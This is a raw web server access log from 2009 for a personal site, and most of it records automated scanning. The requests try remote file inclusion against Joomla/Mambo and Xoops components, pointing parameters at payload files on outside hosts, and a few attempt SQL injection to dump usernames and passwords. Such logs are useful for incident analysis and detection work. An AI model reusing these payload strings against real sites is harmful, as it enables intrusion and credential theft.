211.40.68.132 - - [07/Sep/2009:11:38:55 -0700] "GET /logs/access_080601.log/es_offer.php?files_dir=http://samhwaeng.com/bbs/skin/ruvin_cubic_l3/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.144.44.36 - - [07/Sep/2009:11:38:55 -0700] "GET /xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [07/Sep/2009:11:38:55 -0700] "GET /logs//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [07/Sep/2009:11:38:55 -0700] "GET /logs/access_090326.log%20%20//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.40.68.132 - - [07/Sep/2009:11:38:56 -0700] "GET /es_offer.php?files_dir=http://samhwaeng.com/bbs/skin/ruvin_cubic_l3/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.40.68.132 - - [07/Sep/2009:11:38:56 -0700] "GET /logs/es_offer.php?files_dir=http://samhwaeng.com/bbs/skin/ruvin_cubic_l3/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.157.4.43 - - [07/Sep/2009:11:38:57 -0700] "POST /blog/wp-cron.php?doing_wp_cron HTTP/1.0" 200 1 "-" "WordPress/2.8.4; http://dmulk.com/blog" "dmulk.com"
97.83.114.220 - - [07/Sep/2009:11:38:57 -0700] "GET /?DOCUMENT_ROOT=http://www.avanceinternet.com/installationBAK/id.txt?? HTTP/1.1" 200 19916 "-" "libwww-perl/5.79" "www.dmulk.com"
97.83.114.220 - - [07/Sep/2009:11:38:57 -0700] "GET /logs/?DOCUMENT_ROOT=http://www.avanceinternet.com/installationBAK/id.txt?? HTTP/1.1" 200 116204 "-" "libwww-perl/5.79" "www.dmulk.com"
190.144.44.36 - - [07/Sep/2009:11:39:00 -0700] "GET /logs/access_080501.log%20%20//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
59.24.49.35 - - [07/Sep/2009:11:39:01 -0700] "GET /logs/access_080531.log%20%20//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
204.30.3.225 - - [07/Sep/2009:11:39:01 -0700] "GET /logs/access_080723.log/?DOCUMENT_ROOT=http://www.avanceinternet.com/installationBAK/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.30.3.225 - - [07/Sep/2009:11:39:02 -0700] "GET /?DOCUMENT_ROOT=http://www.avanceinternet.com/installationBAK/id.txt?? HTTP/1.1" 200 19915 "-" "libwww-perl/5.805" "www.dmulk.com"
204.30.3.225 - - [07/Sep/2009:11:39:02 -0700] "GET /logs/?DOCUMENT_ROOT=http://www.avanceinternet.com/installationBAK/id.txt?? HTTP/1.1" 200 116204 "-" "libwww-perl/5.805" "www.dmulk.com"
121.78.116.209 - - [07/Sep/2009:11:39:05 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.78.116.209 - - [07/Sep/2009:11:39:05 -0700] "GET /logs/access_080510.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.78.116.209 - - [07/Sep/2009:11:39:06 -0700] "GET /index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 200 19837 "-" "Mozilla/5.0" "www.dmulk.com"
59.24.49.35 - - [07/Sep/2009:11:39:08 -0700] "GET /logs/access_080531.log%20%20//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.75.245.36 - - [07/Sep/2009:11:39:11 -0700] "GET /logs/components/com_sef/sef.class.php?mosConfig_absolute_path=http://beep-beep.ru/scripts/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.75.245.36 - - [07/Sep/2009:11:39:11 -0700] "GET /components/com_sef/sef.class.php?mosConfig_absolute_path=http://beep-beep.ru/scripts/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.75.245.36 - - [07/Sep/2009:11:39:11 -0700] "GET /logs/access_081017.log/components/com_sef/sef.class.php?mosConfig_absolute_path=http://beep-beep.ru/scripts/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.75.245.36 - - [07/Sep/2009:11:39:11 -0700] "GET /logs/access_080321.log/components/com_sef/sef.class.php?mosConfig_absolute_path=http://beep-beep.ru/scripts/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.239.227.142 - - [07/Sep/2009:11:39:38 -0700] "GET /logs/access_090511.log/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.239.227.142 - - [07/Sep/2009:11:39:38 -0700] "GET /logs/access_090511.log/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.239.227.142 - - [07/Sep/2009:11:39:38 -0700] "GET /?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 19915 "-" "Mozilla/5.0" "www.dmulk.com"
222.239.227.142 - - [07/Sep/2009:11:39:38 -0700] "GET /?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 19916 "-" "Mozilla/5.0" "www.dmulk.com"
222.239.227.142 - - [07/Sep/2009:11:39:38 -0700] "GET /logs/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 116204 "-" "Mozilla/5.0" "www.dmulk.com"
222.239.227.142 - - [07/Sep/2009:11:39:38 -0700] "GET /logs/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 116204 "-" "Mozilla/5.0" "www.dmulk.com"
211.40.68.132 - - [07/Sep/2009:11:39:39 -0700] "GET /logs/access_090321.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://samhwaeng.com/bbs/skin/ruvin_cubic_l3/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.40.68.132 - - [07/Sep/2009:11:39:39 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://samhwaeng.com/bbs/skin/ruvin_cubic_l3/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.40.68.132 - - [07/Sep/2009:11:39:40 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://samhwaeng.com/bbs/skin/ruvin_cubic_l3/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.144.44.36 - - [07/Sep/2009:11:39:46 -0700] "GET /logs/access_090326.log//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [07/Sep/2009:11:39:46 -0700] "GET /logs//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [07/Sep/2009:11:39:46 -0700] "GET /xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.239.227.142 - - [07/Sep/2009:11:39:49 -0700] "GET /logs/access_081111.log/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.78.116.209 - - [07/Sep/2009:11:39:49 -0700] "GET /logs/access_080515.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.239.227.142 - - [07/Sep/2009:11:39:51 -0700] "GET /logs/access_081111.log/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [07/Sep/2009:11:39:53 -0700] "GET /logs/access_080501.log//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.78.116.209 - - [07/Sep/2009:11:39:53 -0700] "GET /logs/access_081111.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:39:54 -0700] "GET /?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 19916 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:39:58 -0700] "GET /?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 19915 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:39:58 -0700] "GET /logs/access_090511.log%20%20/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:39:58 -0700] "GET /logs/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 116204 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:39:59 -0700] "GET /logs/access_090511.log%20%20/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:39:59 -0700] "GET /?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 19916 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:39:59 -0700] "GET /logs/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 116204 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:39:59 -0700] "GET /logs/access_090511.log/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:39:59 -0700] "GET /logs/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 116204 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:40:03 -0700] "GET /logs/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 116204 "-" "Mozilla/5.0" "www.dmulk.com"
211.40.68.132 - - [07/Sep/2009:11:40:03 -0700] "GET /logs/access_080322.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://samhwaeng.com/bbs/skin/ruvin_cubic_l3/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:40:05 -0700] "GET /?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 19915 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:40:05 -0700] "GET /logs/access_090511.log/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:40:16 -0700] "GET /logs/access_081111.log%20%20/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:40:17 -0700] "GET /logs/access_081111.log/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:40:27 -0700] "GET /logs/access_081111.log%20%20/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:40:32 -0700] "GET /logs/access_081111.log/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.112.160 - - [07/Sep/2009:11:40:39 -0700] "GET /bikes/dteel/2009_03_29/?M=A HTTP/1.0" 200 977 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
200.204.51.161 - - [07/Sep/2009:11:41:17 -0700] "GET /logs/access_081107.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.campani.net/logs/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.185.129.45 - - [07/Sep/2009:11:41:24 -0700] "GET /logs/access_090604.log%20%20/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.185.129.45 - - [07/Sep/2009:11:41:24 -0700] "GET /logs/access_080204.log%20%20/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.112.160 - - [07/Sep/2009:11:41:27 -0700] "GET /logs/access_080919.log HTTP/1.0" 200 65536 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
203.185.129.45 - - [07/Sep/2009:11:41:56 -0700] "GET /logs/access_090604.log%20%20/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.185.129.45 - - [07/Sep/2009:11:41:56 -0700] "GET /logs/access_080204.log%20%20/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.185.129.45 - - [07/Sep/2009:11:42:13 -0700] "GET /logs/access_080318.log%20%20/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.112.160 - - [07/Sep/2009:11:42:18 -0700] "GET /logs/access_071210.log HTTP/1.0" 200 177334 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:42:35 -0700] "GET /logs/access_090226.log/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.185.129.45 - - [07/Sep/2009:11:42:36 -0700] "GET /logs/access_080321.log%20%20/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.185.129.45 - - [07/Sep/2009:11:42:39 -0700] "GET /logs/access_080318.log%20%20/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.185.129.45 - - [07/Sep/2009:11:43:02 -0700] "GET /logs/access_080321.log%20%20/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:43:02 -0700] "GET /logs/access_090226.log%20%20/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.112.160 - - [07/Sep/2009:11:43:07 -0700] "GET /logs/access_080725.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
97.83.114.220 - - [07/Sep/2009:11:43:11 -0700] "GET /logs/access_080513.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.avanceinternet.com/installationBAK/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
97.83.114.220 - - [07/Sep/2009:11:43:12 -0700] "GET /index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.avanceinternet.com/installationBAK/id.txt?? HTTP/1.1" 200 19839 "-" "libwww-perl/5.79" "www.dmulk.com"
97.83.114.220 - - [07/Sep/2009:11:43:12 -0700] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.avanceinternet.com/installationBAK/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
97.83.114.220 - - [07/Sep/2009:11:43:15 -0700] "GET /logs/access_080501.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.avanceinternet.com/installationBAK/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:43:15 -0700] "GET /logs/access_090226.log%20%20/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
204.30.3.225 - - [07/Sep/2009:11:43:30 -0700] "GET /logs/access_080513.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://amelebirligi.gov.tr/images/icons/fxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
204.30.3.225 - - [07/Sep/2009:11:43:30 -0700] "GET /logs/access_080501.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://amelebirligi.gov.tr/images/icons/fxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
204.30.3.225 - - [07/Sep/2009:11:43:30 -0700] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://amelebirligi.gov.tr/images/icons/fxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
204.30.3.225 - - [07/Sep/2009:11:43:31 -0700] "GET /index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://amelebirligi.gov.tr/images/icons/fxid1.txt? HTTP/1.1" 200 19835 "-" "Mozilla/5.0" "www.dmulk.com"
189.47.131.152 - - [07/Sep/2009:11:43:34 -0700] "GET /logs/access_080521.log/adxmlrpc.php? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
189.47.131.152 - - [07/Sep/2009:11:43:37 -0700] "GET /adxmlrpc.php? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.78.116.209 - - [07/Sep/2009:11:43:54 -0700] "GET /logs/access_080515.log%20%20//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.78.116.209 - - [07/Sep/2009:11:43:54 -0700] "GET /logs/access_081111.log%20%20//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
204.30.3.225 - - [07/Sep/2009:11:44:02 -0700] "GET /logs/access_080513.log%20%20//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://amelebirligi.gov.tr/images/icons/fxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
204.30.3.225 - - [07/Sep/2009:11:44:02 -0700] "GET /logs/access_080501.log%20%20//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://amelebirligi.gov.tr/images/icons/fxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
204.30.3.225 - - [07/Sep/2009:11:44:02 -0700] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://amelebirligi.gov.tr/images/icons/fxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
204.30.3.225 - - [07/Sep/2009:11:44:03 -0700] "GET /index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://amelebirligi.gov.tr/images/icons/fxid1.txt? HTTP/1.1" 200 19835 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:44:03 -0700] "GET /logs/access_081111.log%20%20/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:44:06 -0700] "GET /logs/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 116204 "-" "Mozilla/5.0" "www.dmulk.com"
94.75.245.36 - - [07/Sep/2009:11:44:13 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://beep-beep.ru/scripts/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.75.245.36 - - [07/Sep/2009:11:44:13 -0700] "GET /logs/access_080530.log/joomla/index.php?option=com_restaurante&task=http://beep-beep.ru/scripts/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.75.245.36 - - [07/Sep/2009:11:44:13 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://beep-beep.ru/scripts/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.75.245.36 - - [07/Sep/2009:11:44:13 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://beep-beep.ru/scripts/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.75.245.36 - - [07/Sep/2009:11:44:13 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://beep-beep.ru/scripts/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.75.245.36 - - [07/Sep/2009:11:44:14 -0700] "GET /logs/access_080530.log%20%20/joomla/index.php?option=com_restaurante&task=http://beep-beep.ru/scripts/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.75.245.36 - - [07/Sep/2009:11:44:14 -0700] "GET /logs/access_081123.log%20%20/joomla/index.php?option=com_restaurante&task=http://beep-beep.ru/scripts/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.117.85.108 - - [07/Sep/2009:11:44:16 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://beep-beep.ru/scripts/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.117.85.108 - - [07/Sep/2009:11:44:16 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://beep-beep.ru/scripts/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.117.85.108 - - [07/Sep/2009:11:44:16 -0700] "GET /logs/access_080530.log%20%20/joomla/index.php?option=com_restaurante&task=http://beep-beep.ru/scripts/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.117.85.108 - - [07/Sep/2009:11:44:16 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://beep-beep.ru/scripts/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.117.85.108 - - [07/Sep/2009:11:44:17 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://beep-beep.ru/scripts/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.117.85.108 - - [07/Sep/2009:11:44:17 -0700] "GET /logs/access_080530.log/joomla/index.php?option=com_restaurante&task=http://beep-beep.ru/scripts/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.117.85.108 - - [07/Sep/2009:11:44:17 -0700] "GET /logs/access_081123.log%20%20/joomla/index.php?option=com_restaurante&task=http://beep-beep.ru/scripts/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.75.245.36 - - [07/Sep/2009:11:44:18 -0700] "GET /logs/access_080530.log/joomla/index.php?option=com_restaurante&task=http://beep-beep.ru/scripts/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.75.245.36 - - [07/Sep/2009:11:44:18 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://beep-beep.ru/scripts/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.75.245.36 - - [07/Sep/2009:11:44:18 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://beep-beep.ru/scripts/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.75.245.36 - - [07/Sep/2009:11:44:18 -0700] "GET /logs/access_081123.log/joomla/index.php?option=com_restaurante&task=http://beep-beep.ru/scripts/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.117.85.108 - - [07/Sep/2009:11:44:19 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://beep-beep.ru/scripts/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.117.85.108 - - [07/Sep/2009:11:44:19 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://beep-beep.ru/scripts/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.117.85.108 - - [07/Sep/2009:11:44:19 -0700] "GET /logs/access_080530.log/joomla/index.php?option=com_restaurante&task=http://beep-beep.ru/scripts/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.117.85.108 - - [07/Sep/2009:11:44:20 -0700] "GET /logs/access_081123.log/joomla/index.php?option=com_restaurante&task=http://beep-beep.ru/scripts/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.112.160 - - [07/Sep/2009:11:44:21 -0700] "GET /bikes/dteel/?N=D HTTP/1.0" 200 5230 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
58.184.252.3 - - [07/Sep/2009:11:44:51 -0700] "GET /logs/access_080228.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
81.169.141.50 - - [07/Sep/2009:11:45:16 -0700] "GET /logs//index.php?option=com_simpleboard&func=view&catid=-999+union+select+2,2,3,concat(0x3a,0x3a,username,0x3a,password),5+from+mos_users/* HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.169.141.50 - - [07/Sep/2009:11:45:16 -0700] "GET /logs/access_080226.log//index.php?option=com_simpleboard&func=view&catid=-999+union+select+2,2,3,concat(0x3a,0x3a,username,0x3a,password),5+from+mos_users/* HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.169.141.50 - - [07/Sep/2009:11:45:17 -0700] "GET /index.php?option=com_simpleboard&func=view&catid=-999+union+select+2,2,3,concat(0x3a,0x3a,username,0x3a,password),5+from+mos_users/* HTTP/1.1" 200 19867 "-" "libwww-perl/5.805" "www.dmulk.com"
